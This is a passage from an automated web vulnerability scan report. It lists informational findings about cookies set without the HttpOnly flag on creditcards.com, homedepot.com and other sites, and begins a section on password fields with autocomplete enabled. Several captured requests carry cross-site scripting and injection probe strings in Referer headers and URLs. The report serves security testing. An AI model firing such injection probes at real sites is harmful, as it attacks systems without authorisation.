11.372. http://www.creditcards.com/javascript/application.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/application.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307384908540; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/application.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:04 GMT
Server: Apache
Last-Modified: Fri, 19 Jun 2009 16:27:40 GMT
ETag: "9f62a8-6fb-46cb600cb1700"
Accept-Ranges: bytes
Content-Length: 1787
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308307384908540; path=/
Set-Cookie: SSBAL=node.web2; path=/

defaultStatus="Welcome to CreditCards.com";

function Application(URL){
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL,'" + id + "','toolbar=1,scrollbars=1,location=0,
...[SNIP]...

11.373. http://www.creditcards.com/javascript/bluekai.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/bluekai.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661247438; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/bluekai.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Thu, 21 Oct 2010 21:38:39 GMT
ETag: "7a735b-103-49327595b35c0"
Accept-Ranges: bytes
Content-Length: 259
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309661247438; path=/
Set-Cookie: SSBAL=node.web1; path=/

function getmetaContents(mn){
var m = document.getElementsByTagName('meta');
for(var i in m){
if(m[i].name == mn){
return m[i].content;
}
}
}

bk_addPageCtx('ke
...[SNIP]...

11.374. http://www.creditcards.com/javascript/mvt/tooltip.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/mvt/tooltip.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661307420; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/mvt/tooltip.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:37 GMT
ETag: "7ae196-1378-46712310f4840"
Accept-Ranges: bytes
Content-Length: 4984
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309661307420; path=/
Set-Cookie: SSBAL=node.web1; path=/

var ns4 = document.layers;
var ns6 = document.getElementById && !document.all || (navigator.userAgent.indexOf('Opera') >= 0);
var ie4 = document.all;

var requester = null;

var offsetX = 0;
var offse
...[SNIP]...

11.375. http://www.creditcards.com/javascript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307390241774; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/s_code.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:10 GMT
Server: Apache
Last-Modified: Fri, 10 Sep 2010 19:29:31 GMT
ETag: "7a7477-5e8d-48fecc40bbcc0"
Accept-Ranges: bytes
Content-Length: 24205
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308307390241774; path=/
Set-Cookie: SSBAL=node.web1; path=/

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

//var s_account="ccardstesting" // TESTING ENVIRONMENT
var s_account="ccardsc
...[SNIP]...

11.376. http://www.creditcards.com/javascript/thickbox/jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/thickbox/jquery.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309659955368; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/thickbox/jquery.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:59 GMT
Server: Apache
Last-Modified: Fri, 22 May 2009 15:39:30 GMT
ETag: "add491-1d7bb-46a8210fab080"
Accept-Ranges: bytes
Content-Length: 120763
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309659955368; path=/
Set-Cookie: SSBAL=node.web2; path=/

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

11.377. http://www.creditcards.com/javascript/thickbox/mvt/interstitial.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/thickbox/mvt/interstitial.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309658680326; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/thickbox/mvt/interstitial.css HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 19:06:28 GMT
ETag: "925ba5-fdb-471ab90b57500"
Accept-Ranges: bytes
Content-Length: 4059
Vary: Accept-Encoding
Content-Type: text/css
Set-Cookie: Apache=66.219.46.81.1308309658680326; path=/
Set-Cookie: SSBAL=node.web1; path=/

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...

11.378. http://www.creditcards.com/javascript/thickbox/mvt/interstitial.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/thickbox/mvt/interstitial.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309659952733; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/thickbox/mvt/interstitial.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 19:06:28 GMT
ETag: "925ba6-3bf3-471ab90b57500"
Accept-Ranges: bytes
Content-Length: 15347
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309659952733; path=/
Set-Cookie: SSBAL=node.web1; path=/

/*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licen
...[SNIP]...

11.379. http://www.creditcards.com/javascript/thickbox/mvt/jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/thickbox/mvt/jquery.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309660952713; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/thickbox/mvt/jquery.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:00 GMT
Server: Apache
Last-Modified: Thu, 20 Aug 2009 18:51:17 GMT
ETag: "925ba0-1d7bb-471973c915340"
Accept-Ranges: bytes
Content-Length: 120763
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309660952713; path=/
Set-Cookie: SSBAL=node.web1; path=/

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

11.380. http://www.creditcards.com/javascript/thickbox/thickbox.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/thickbox/thickbox.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309659252561; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/thickbox/thickbox.css HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:59 GMT
Server: Apache
Last-Modified: Wed, 03 Jun 2009 19:47:54 GMT
ETag: "add493-1112-46b76ef6c2e80"
Accept-Ranges: bytes
Content-Length: 4370
Vary: Accept-Encoding
Content-Type: text/css
Set-Cookie: Apache=66.219.46.81.1308309659252561; path=/
Set-Cookie: SSBAL=node.web2; path=/

/* custom close button */
a.close-btn:link, a.close-btn:active, a.close-btn:visited {
background-color:#940707;
border:1px solid #CCCCCC;
color:#FFF;
font-weight:bold;
margin:0 5px
...[SNIP]...

11.381. http://www.creditcards.com/javascript/thickbox/thickbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/thickbox/thickbox.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309658638960; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/thickbox/thickbox.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:58 GMT
Server: Apache
Last-Modified: Fri, 18 Jun 2010 19:47:17 GMT
ETag: "add4ca-3bd8-4895338ea1b40"
Accept-Ranges: bytes
Content-Length: 15320
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309658638960; path=/
Set-Cookie: SSBAL=node.web2; path=/

/*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licen
...[SNIP]...

11.382. http://www.creditcards.com/javascript/tynt.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/javascript/tynt.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661275246; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascript/tynt.js HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Thu, 02 Dec 2010 19:29:29 GMT
ETag: "7a80a2-25b-4967270c15840"
Accept-Ranges: bytes
Content-Length: 603
Vary: Accept-Encoding
Content-Type: application/javascript
Set-Cookie: Apache=66.219.46.81.1308309661275246; path=/
Set-Cookie: SSBAL=node.web1; path=/

/*
* Tynt copy/paste script: Ticket: #26236
* Tacks on site reference to any content copied and pasted from site.
*/
if(document.location.protocol=='http:'){
var Tynt=Tynt||[];Tynt.push('dtS7p
...[SNIP]...

11.383. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc//%2522ns%253D%2522netsparker%25280x000132%2529)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:17 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=180c2ce7e1f8bfc044a43ab4&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705471737359982&data3=0&sid=1889&c=
Vary: Accept-Encoding
Content-Length: 2766
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:17 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

11.384. http://www.creditcards.com/oc/Netsparker3643bc898af148cda9073d161734fcbb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparker3643bc898af148cda9073d161734fcbb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cardOfferHistory=deleted; expires=Thu, 17-Jun-2010 10:42:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /oc/Netsparker3643bc898af148cda9073d161734fcbb/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377259269; PHPSESSID=04d1be4ab7a383c538ee898c7e69a383; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=998&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=&ref=&oid=1022011061705425721298274&data3=0&sid=1889&c=
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: cardOfferHistory=deleted; expires=Thu, 17-Jun-2010 10:42:56 GMT; path=/

11.385. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparker8d82b62392124f8783667c0217ea8f35/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:46:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:46:27 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705464982056995&data3=0&sid=1889&c=
Vary: Accept-Encoding
Content-Length: 2726
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:46:49 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

11.386. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:46:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:46:48 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705464968578073&data3=0&sid=1889&c=
Vary: Accept-Encoding
Content-Length: 2726
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:46:49 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

11.387. http://www.creditcards.com/sb.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/sb.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307493749599; path=/
CCsCookieimp=1308307493; expires=Mon, 14-Jun-2021 10:44:53 GMT; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sb.php?a_aid=1000&a_bid=36 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:44:53 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: Apache=66.219.46.81.1308307493749599; path=/
Set-Cookie: CCsCookieimp=1308307493; expires=Mon, 14-Jun-2021 10:44:53 GMT; path=/
Set-Cookie: SSBAL=node.web2; path=/
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Pragma: no-cache

11.388. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

40M3=3pWFyY9kEMHcGlaEIu8sNOSezY6Lr3vF3hNXsIhb5R5YYUx_6BT81lw; expires=Thu, 14-Jul-2011 11:38:29 GMT; path=/; domain=.homedepot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.389. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/orange_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

40M3=3h6q5Iw1xkSdtSdu92pP7Z4L72F3OloXD0N6PAxp8WRrSq-T_qifPUA; expires=Thu, 14-Jul-2011 11:37:04 GMT; path=/; domain=.homedepot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.390. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/ProductDisplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224139234%3a%3bC25%5fEXP%3d1360064139%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:39 GMT;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.391. http://www.wtp101.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/admeld_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sat, 15 Jun 2013 13:06:13 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12. Password field with autocomplete enabled previous next
There are 10 instances of this issue:

http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html
http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html
http://online.wsj.com/home-page
http://soundcloud.com/
http://soundcloud.com/help
http://soundcloud.com/help/premium-accounts
http://soundcloud.com/premium
https://soundcloud.com/login
https://soundcloud.com/login
https://soundcloud.com/login'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

